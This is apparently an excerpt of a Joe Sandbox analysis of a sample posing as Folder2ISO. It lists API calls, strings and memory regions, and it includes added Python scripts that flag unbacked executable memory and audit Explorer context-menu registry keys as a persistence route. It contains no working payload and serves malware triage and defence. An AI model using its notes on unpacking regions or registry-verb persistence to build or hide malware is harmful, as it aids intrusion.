                  • Opcode ID: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction ID: c6023400509a16f557e892a86fdd8146675fc6926eccb1ad2bee86c83abd2167
                  • Opcode Fuzzy Hash: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction Fuzzy Hash:
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction ID: c6023400509a16f557e892a86fdd8146675fc6926eccb1ad2bee86c83abd2167
                  • Opcode Fuzzy Hash: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction Fuzzy Hash:
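The dump names in the Source File lines encode where each snapshot came from. The Folder2ISO GUI code sits in the image mapped at 0x00620000 (based on PE: true), whereas every entry that carries a Yara match comes from the region at 0x02D90000, whose name ends in `.00000040.00001000.00020000.00000000` and is not backed by a PE. The Python below is an added example, not part of the report or of Joe Sandbox: it parses such lines and flags private, executable-and-writable regions with no PE backing as unpacking candidates. The dump-name layout, the reading of the protection group as a Windows PAGE_* constant and of the type group as a MEM_* region type are assumptions checked only against the three names on this page.

```python
import re
from dataclasses import dataclass, replace

# Windows page-protection and region-type constants from winnt.h.
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
PAGE_READWRITE, PAGE_WRITECOPY = 0x04, 0x08
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
_EXEC = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
_WRITE = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumed dump-name layout, checked only against the names on this page:
#   <proc>.<phase>.<dumpid>.<base>.<protect>.<flags>.<type>.<extra>.sdmp
_SDMP = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\."
    r"(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp",
    re.I,
)
_SOURCE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)",
    re.I,
)


@dataclass(frozen=True)
class DumpRegion:
    base: int
    protect: int
    region_type: int
    pe_backed: bool
    yara_match: bool = False

    def verdict(self) -> str:
        exe, wr = bool(self.protect & _EXEC), bool(self.protect & _WRITE)
        if self.region_type == MEM_IMAGE and self.pe_backed:
            return "image"                 # code of the on-disk PE, e.g. the Folder2ISO GUI
        if exe and wr and self.region_type == MEM_PRIVATE and not self.pe_backed:
            return "private-rwx-unbacked"  # RWX private memory with no PE header: unpacked payload
        if exe and self.region_type == MEM_MAPPED:
            return "mapped-exec"
        return "other"


def parse_source_line(line: str) -> DumpRegion:
    """Turn one 'Source File: ...sdmp, Offset: ..., based on PE: ...' line into a DumpRegion."""
    src = _SOURCE.search(line)
    if src is None:
        raise ValueError(f"not a Source File line: {line!r}")
    name = _SDMP.fullmatch(src["name"])
    if name is None:
        raise ValueError(f"unexpected dump name: {src['name']}")
    return DumpRegion(
        base=int(name["base"], 16),
        protect=int(name["protect"], 16),
        region_type=int(name["type"], 16),
        pe_backed=src["pe"].lower() == "true",
    )


def triage(report_lines) -> list:
    """Collect the distinct regions in a report excerpt. In the report layout a
    'Yara matches' line belongs to the Source File entry that precedes it."""
    regions: dict = {}
    current = None
    for raw in report_lines:
        line = raw.strip().lstrip("• ").strip()
        if line.startswith("Source File:"):
            current = parse_source_line(line)
            seen = regions.get(current.base)
            regions[current.base] = replace(current, yara_match=seen.yara_match) if seen else current
        elif line.startswith("Yara matches") and current is not None:
            regions[current.base] = replace(regions[current.base], yara_match=True)
    return sorted(regions.values(), key=lambda r: r.base)


def unpacked_candidates(regions) -> list:
    """Regions worth extracting from the sandbox for static analysis."""
    return [r for r in regions if r.verdict() == "private-rwx-unbacked" or (r.yara_match and not r.pe_backed)]


# Constructed sample: three Source File lines copied from this report, in the
# order and with the 'Yara matches' marker that the report shows.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
Joe Sandbox IDA Plugin
Memory Dump Source
• Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
Joe Sandbox IDA Plugin
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
""".splitlines()

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r.base:#010x} protect={r.protect:#04x} type={r.region_type:#x} yara={r.yara_match} -> {r.verdict()}")
```

Run against the three names on this page, only the 0x02D90000 region comes back as an unpacking candidate, which is also the only region with Yara matches; the 0x031D1000 region is executable but mapped and read-only, consistent with a mapped module rather than an in-memory payload.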
                  APIs
                  • GetMessagePos.USER32 ref: 00621803
                  • CreatePopupMenu.USER32 ref: 00621815
                  • CreatePopupMenu.USER32 ref: 00621836
                  • InsertMenuW.USER32(00000000,00000000,00000400,0000000B,00647BF0), ref: 00621851
                  • CheckMenuRadioItem.USER32(00000000,00000000,0000000C,00000400), ref: 00621872
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006218A6
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006218DD
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621919
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621955
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621993
                  • GetWindowLongW.USER32(?,000000EC), ref: 006219AF
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006219C5
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006219F1
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A10
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A2F
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A4A
                  • TrackPopupMenu.USER32(00000030,00000180,?,?,00000000,?,00000000), ref: 00621A6A
                  • DestroyMenu.USER32(?,?,CloseWhenDone,00000000,?,RevealWhenDone,00000000,?,AllowMultipleInstances,00000001), ref: 00621A76
                  • DialogBoxParamW.USER32(00000002,?,00622DA2,00000000), ref: 00621A8F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Menu$InsertItem$Popup$Create$CheckDestroyDialogLongMessageParamRadioTrackWindow
                  • String ID: 0$AllowMultipleInstances$C$CloseWhenDone$Folder2ISO$LangId$RevealWhenDone$TopMost$Usage:folder2iso [switches] [source folder]Switches:-label [label]-output [target iso file]Examples:folder2iso "d:\foo$https://github.com/imgdrive/Folder2ISO$https://github.com/imgdrive/Folder2ISO/issues
                  • API String ID: 3856043901-1160743212
                  • Opcode ID: 7b71c6f5149e35a7f61da028a1d67de30c7875d642998f7f14c7790f2aad5576
                  • Instruction ID: c2a189a04244e15c52d8f17e5f81e187631c35d59e54837d8e9580f82d969ce7
                  • Opcode Fuzzy Hash: 7b71c6f5149e35a7f61da028a1d67de30c7875d642998f7f14c7790f2aad5576
                  • Instruction Fuzzy Hash: FEA1137150C714BBD310AF64EC85E6F7BEEEB87364F210A1EF1559A2D0DA709A408F26
                  APIs
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 006223DF
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 00622401
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 0062241E
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 00622437
                  • SetDlgItemTextW.USER32(?,0000000E,?), ref: 00622483
                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 006224A9
                  • wsprintfW.USER32 ref: 006224ED
                  • MessageBoxW.USER32(?,?,Folder2ISO,00000021), ref: 00622506
                  • GetDlgItem.USER32(?,00000010), ref: 00622577
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00622581
                    • Part of subcall function 00622145: GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 0062216B
                    • Part of subcall function 00622145: SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?,?,00000104), ref: 00622193
                    • Part of subcall function 00622145: CoInitialize.OLE32(00000000), ref: 0062219A
                    • Part of subcall function 00622145: CoUninitialize.OLE32(?,?,00000104), ref: 006221C4
                  • _memset.LIBCMT ref: 006225C5
                  • GetDlgItemTextW.USER32(?,0000000F,?,00000080), ref: 006225DA
                  • GetWindowLongW.USER32(?,000000EB), ref: 006225E8
                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 006225FF
                  • GetDlgItem.USER32(?,00000011), ref: 00622612
                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0062261E
                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00622655
                  • SetTimer.USER32(?,0000000F,000001F4,00000000), ref: 00622660
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$LongMessageWindow$PathSend$FolderFullInitializeNameTimerUninitialize_memsetwsprintf
                  • String ID: .iso$FileSystem$Folder2ISO$Folder2ISO$Folder2ISO 1.2
                  • API String ID: 94365609-1827313546
                  • Opcode ID: ac0274ab9c8491992963da8351e5865c19c914602fcbb2b450748a74d7192b3e
                  • Instruction ID: 8d6e2fc3c8b19eaf04189caad2dd0bab2ce0c08b83ab484619c348bea0c77111
                  • Opcode Fuzzy Hash: ac0274ab9c8491992963da8351e5865c19c914602fcbb2b450748a74d7192b3e
                  • Instruction Fuzzy Hash: 987112B21047267BD730EB60EC96FEB779EEF49310F000819F645E6182DBB4DA44CAA1
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000,00000001), ref: 00621669
                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Classes,00000000,0002001F,?), ref: 00621691
                  • RegCreateKeyExW.ADVAPI32(?,Folder\shell\Folder2ISO,00000000,00000000,00000000,00020006,00000000,?,?), ref: 006216BB
                  • RegSetValueExW.ADVAPI32(?,Icon,00000000,00000001,?,00000000), ref: 0062171C
                  • RegCreateKeyExW.ADVAPI32(?,command,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0062173C
                  • lstrlenW.KERNEL32(?), ref: 00621761
                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000), ref: 0062177E
                  • RegCloseKey.ADVAPI32(?), ref: 00621784
                  • RegCloseKey.ADVAPI32(?), ref: 0062178A
                  • RegCloseKey.ADVAPI32(?), ref: 00621790
                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Classes,00000000,0002001F,?,?,00000000,00000001), ref: 006217AA
                  • RegDeleteKeyW.ADVAPI32(?,Folder\shell\Folder2ISO\command), ref: 006217C3
                  • RegDeleteKeyW.ADVAPI32(?,Folder\shell\Folder2ISO), ref: 006217CE
                  • RegCloseKey.ADVAPI32(?), ref: 006217D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Close$CreateDeleteOpenValue$FileModuleNamelstrlen
                  • String ID: "%1"$Folder\shell\Folder2ISO$Folder\shell\Folder2ISO\command$Icon$Software\Classes$command
                  • API String ID: 3424706042-3616335184
                  • Opcode ID: 019a6a03b4d83ada43020338db1a297875737b456a6372c271addb5c078b6f1b
                  • Instruction ID: 18a182705871b81ad1bbec65ac81d3584ddd6940e18466cfa15e7ba5d3e0d4a8
                  • Opcode Fuzzy Hash: 019a6a03b4d83ada43020338db1a297875737b456a6372c271addb5c078b6f1b
                  • Instruction Fuzzy Hash: 5041F035244316BBE7209F61EC05FAB7BAEFF85B44F51082DF98196160E731A805CB62
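The routine above registers a per-user Explorer context-menu verb: it opens HKCU\Software\Classes, creates Folder\shell\Folder2ISO with an Icon value, and sets Folder\shell\Folder2ISO\command to the running module's own path (from GetModuleFileNameW) followed by "%1"; the second half deletes both keys again. That is ordinary Folder2ISO behaviour, but the same key is a convenient way for a binary running out of a user profile to be launched every time a folder is right-clicked, so it is worth auditing on a host where this sample ran. The Python below is an added example, not code from the report or from Folder2ISO: it parses a constructed `reg export HKCU\Software\Classes` text and flags shell verbs whose handler lives in a user-writable directory. The executable path in the sample is inferred from the .ini path the report shows (`C:\Users\user\Desktop\6RVmzn1DzL.ini`) and is an assumption, as is the benign contrast entry.

```python
import re
from dataclasses import dataclass

# Per-user shell verbs live under HKCU\Software\Classes\<class>\shell\<verb>\command,
# the key the registration routine on this page writes as Folder\shell\Folder2ISO\command.
_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_DEFAULT_VALUE = re.compile(r'^@="(?P<val>(?:\\.|[^"\\])*)"$')
_VERB_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\(?P<cls>[^\\]+)\\shell\\(?P<verb>[^\\]+)\\command$",
    re.I,
)
# First token of the command line: a quoted path or a bare one.
_FIRST_TOKEN = re.compile(r'^\s*(?:"(?P<quoted>[^"]+)"|(?P<bare>\S+))')

# Directories an ordinary user can write to; a verb whose handler lives there runs
# user-controlled code every time the verb is clicked.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def _unescape(value: str) -> str:
    """Undo .reg string escaping: a backslash escapes the character after it."""
    return re.sub(r"\\(.)", r"\1", value)


@dataclass(frozen=True)
class ShellVerb:
    cls: str
    verb: str
    command: str

    def executable(self) -> str:
        m = _FIRST_TOKEN.match(self.command)
        return (m["quoted"] or m["bare"]) if m else ""

    def suspicious(self) -> bool:
        exe = self.executable().lower()
        return any(marker in exe for marker in USER_WRITABLE_MARKERS)


def parse_reg(text: str) -> list:
    """Extract every HKCU shell-verb command (the key's default value) from a .reg export."""
    verbs, current_key = [], None
    for line in text.splitlines():
        line = line.strip()
        k = _KEY.match(line)
        if k:
            current_key = k["key"]
            continue
        v = _DEFAULT_VALUE.match(line)
        if v and current_key:
            vk = _VERB_KEY.match(current_key)
            if vk:
                verbs.append(ShellVerb(vk["cls"], vk["verb"], _unescape(v["val"])))
    return verbs


def audit(text: str) -> list:
    """Verbs whose handler executable sits in a user-writable location."""
    return [v for v in parse_reg(text) if v.suspicious()]


# Constructed sample: what a `reg export HKCU\Software\Classes` would contain after the
# registration routine has run from the Desktop (path inferred from the .ini path in
# this report), plus one assumed benign verb under Program Files for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Folder\shell\Folder2ISO]
"Icon"="C:\\Users\\user\\Desktop\\6RVmzn1DzL.exe"

[HKEY_CURRENT_USER\Software\Classes\Folder\shell\Folder2ISO\command]
@="\"C:\\Users\\user\\Desktop\\6RVmzn1DzL.exe\" \"%1\""

[HKEY_CURRENT_USER\Software\Classes\Directory\shell\OpenWithEditor\command]
@="\"C:\\Program Files\\Editor\\editor.exe\" \"%V\""
'''

if __name__ == "__main__":
    for v in parse_reg(SAMPLE_REG):
        flag = "SUSPICIOUS" if v.suspicious() else "ok"
        print(f"{flag:10} {v.cls}\\shell\\{v.verb}: {v.command}")
```

On a live host the same check runs over the output of `reg export HKCU\Software\Classes classes.reg`; the path heuristic is deliberately coarse, so treat a hit as a lead to confirm against the file's hash and signer rather than as a verdict.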
                  APIs
                  • GetDlgItem.USER32(?,00000003), ref: 00621C77
                  • EnableWindow.USER32(00000000), ref: 00621C80
                  • GetDlgItem.USER32(?,0000000D), ref: 00621C86
                  • EnableWindow.USER32(00000000), ref: 00621C89
                  • GetDlgItem.USER32(?,0000000A), ref: 00621C8F
                  • EnableWindow.USER32(00000000), ref: 00621C92
                  • GetDlgItem.USER32(?,00000004), ref: 00621C98
                  • EnableWindow.USER32(00000000), ref: 00621C9B
                  • GetDlgItem.USER32(?,0000000E), ref: 00621CA1
                  • EnableWindow.USER32(00000000), ref: 00621CA4
                  • GetDlgItem.USER32(?,0000000B), ref: 00621CAA
                  • EnableWindow.USER32(00000000), ref: 00621CAD
                  • GetDlgItem.USER32(?,00000005), ref: 00621CB3
                  • EnableWindow.USER32(00000000), ref: 00621CB6
                  • GetDlgItem.USER32(?,0000000F), ref: 00621CBC
                  • EnableWindow.USER32(00000000), ref: 00621CBF
                  • GetDlgItem.USER32(?,00000006), ref: 00621CC5
                  • EnableWindow.USER32(00000000), ref: 00621CC8
                  • GetDlgItem.USER32(?,00000010), ref: 00621CCE
                  • EnableWindow.USER32(00000000), ref: 00621CD1
                  • GetDlgItem.USER32(?,00000007), ref: 00621CD7
                  • EnableWindow.USER32(00000000), ref: 00621CDA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: EnableItemWindow
                  • String ID:
                  • API String ID: 3833022359-0
                  • Opcode ID: 7998ffd9c7c54e32890a9968648734bb79d6b564c457aec98d77e8186d4c1c34
                  • Instruction ID: 10a26954da15203ffdaa68d94abc7d12330706722adf03f19fb214b9a958675f
                  • Opcode Fuzzy Hash: 7998ffd9c7c54e32890a9968648734bb79d6b564c457aec98d77e8186d4c1c34
                  • Instruction Fuzzy Hash: A30102D5E4136C3DF97033B75C8DF6B6D0DCFC57E9F020812BA0AA618288A9AC008DB0
                  APIs
                  • SetWindowTextW.USER32(?,Folder2ISO 1.2 (x86) 2024-06-19), ref: 00621488
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00621491
                  • GetUserDefaultLangID.KERNEL32(?,LangId,00000000,?,?,?,?,?,?,00622900), ref: 006214AC
                  • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,00000000,TopMost,00000000,?,LangId,00000000), ref: 00621524
                  • LoadIconW.USER32(00000001,00000000), ref: 00621532
                  • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0062154A
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00621551
                  • ImageList_LoadImageW.COMCTL32(00000001,00000010,00000003,000000FF,00000000,00002000,?,LangId,00000000,?,?,?,?,?,?,00622900), ref: 00621568
                  • GetDlgItem.USER32(?,00000010), ref: 00621576
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 00621590
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 0062159F
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 006215AE
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 006215BD
                  • SendMessageW.USER32(00000000,0000014E,00000003,00000000), ref: 006215E1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: MessageSend$ImageLoadWindow$AcceptDefaultDragFilesIconItemLangList_TextUser
                  • String ID: FileSystem$Folder2ISO 1.2 (x86) 2024-06-19$LangId$TopMost
                  • API String ID: 3138248541-2740339452
                  • Opcode ID: d2eb694c1907268927473d08619d458355a3e904c0ed73975658ecffa04a513c
                  • Instruction ID: c897b01b836a3da5aa027ff52daa0561cb044f51768d159d67cc2a76b2ee01f6
                  • Opcode Fuzzy Hash: d2eb694c1907268927473d08619d458355a3e904c0ed73975658ecffa04a513c
                  • Instruction Fuzzy Hash: D84148713847257EF3246B20BC96F7B369FEB43B54F20111DFA01AE1D0DAA59E808638
                  APIs
                    • Part of subcall function 00621E9A: SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                    • Part of subcall function 00621E9A: GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                    • Part of subcall function 00621E9A: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000000,?,00000000,?), ref: 00621F56
                  • SetDlgItemTextW.USER32(00000000,0000000D,?), ref: 00621FA4
                  • SetDlgItemTextW.USER32(00000000,0000000E,?), ref: 00621FAE
                  • SetDlgItemTextW.USER32(00000000,0000000F,?), ref: 00621FB8
                  • _memset.LIBCMT ref: 00621FF7
                  • SetDlgItemTextW.USER32(00000000,0000000F,?), ref: 00622014
                  • SetDlgItemTextW.USER32(00000000,0000000E,?), ref: 00622079
                  • GetDlgItem.USER32(00000000,00000007), ref: 0062208A
                  • EnableWindow.USER32(00000000), ref: 0062208D
                  • GetDlgItem.USER32(00000000,00000007), ref: 00622096
                  • SendMessageW.USER32(00000000,00000028,00000000,00000001), ref: 0062209E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$MessageSend$EnableFullNamePathWindow_memset
                  • String ID: .iso
                  • API String ID: 695811232-4289765698
                  • Opcode ID: baf839a46df9ba6e931c95c4fdbd6e7d2e0e02b4e245c0422d146fc10cfa3688
                  • Instruction ID: fe0527d91d0201d0787ea0ce8bef936e61672a7ed908a279aa91f99d93abd71d
                  • Opcode Fuzzy Hash: baf839a46df9ba6e931c95c4fdbd6e7d2e0e02b4e245c0422d146fc10cfa3688
                  • Instruction Fuzzy Hash: 25412A71604716BBD730DB64AC85FEBB7DEFFA4700F400429FA4597181EA70A945CA92
                  APIs
                  • _memset.LIBCMT ref: 00622C85
                  • GetDlgItem.USER32(?,00000035), ref: 00622C90
                  • LoadImageW.USER32(00000001,00000001,00000000,00000000,00000040), ref: 00622CA6
                  • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 00622CB4
                  • SetDlgItemTextW.USER32(?,00000032,Folder2ISO 1.2 (x86) 2024-06-19), ref: 00622CC8
                  • SetDlgItemTextW.USER32(?,00000034,<a>https://www.yubsoft.com</a>), ref: 00622CD2
                  • SetDlgItemTextW.USER32(?,00000033,?), ref: 00622CF4
                  • SetDlgItemTextW.USER32(?,00000003,?), ref: 00622D34
                  • SetWindowTextW.USER32(?,?), ref: 00622D83
                  Strings
                  • <a>https://www.yubsoft.com</a>, xrefs: 00622CCA
                  • Translator: null, xrefs: 00622D16
                  • Folder2ISO 1.2 (x86) 2024-06-19, xrefs: 00622CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ItemText$ImageLoadMessageSendWindow_memset
                  • String ID: <a>https://www.yubsoft.com</a>$Folder2ISO 1.2 (x86) 2024-06-19$Translator: null
                  • API String ID: 373444793-2269206193
                  • Opcode ID: 6f4e0d6c2431f8411cc3af455ff3b958bc8a029d8bfcea363776cd1ad7362c57
                  • Instruction ID: 73a37f19acf6d09516be8f71eac8eacb44f18370b04841ae91cf35b60450ffb2
                  • Opcode Fuzzy Hash: 6f4e0d6c2431f8411cc3af455ff3b958bc8a029d8bfcea363776cd1ad7362c57
                  • Instruction Fuzzy Hash: C7312935244716ABC725DF64EC55BBB37BAFF86750F00082EF2018B2A0E7B99549CB52
                  APIs
                  • _memset.LIBCMT ref: 00622223
                  • lstrcpyW.KERNEL32(?,00622396), ref: 0062223C
                  • GetSaveFileNameW.COMDLG32(?), ref: 00622274
                  • lstrcatW.KERNEL32(-00000002,.iso), ref: 006222A9
                  • SetDlgItemTextW.USER32(?,0000000E,?), ref: 006222B7
                  • GetDlgItem.USER32(?,00000007), ref: 006222C8
                  • EnableWindow.USER32(00000000), ref: 006222CB
                  • GetDlgItem.USER32(?,00000007), ref: 006222D4
                  • SendMessageW.USER32(?,00000028,00000000,00000001), ref: 006222DC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$EnableFileMessageNameSaveSendTextWindow_memsetlstrcatlstrcpy
                  • String ID: .iso$X
                  • API String ID: 1111325823-3055512534
                  • Opcode ID: 063948163f887e793d06deda0f5ce089421e0c541bbd26bcf01566e6e9177b3f
                  • Instruction ID: da33f0006adfb9c4d856e2695c55ba3e1b14f729a70dc9c80db941505c366cf8
                  • Opcode Fuzzy Hash: 063948163f887e793d06deda0f5ce089421e0c541bbd26bcf01566e6e9177b3f
                  • Instruction Fuzzy Hash: 5E313336548711ABD320DF60EC8AB9B7BE9EF85B10F00092EF64496290DBB5D644CB92
                  APIs
                  • SetDlgItemTextW.USER32(?,00000003,00000000), ref: 006212CE
                  • SetDlgItemTextW.USER32(?,00000004,00000000), ref: 006212DC
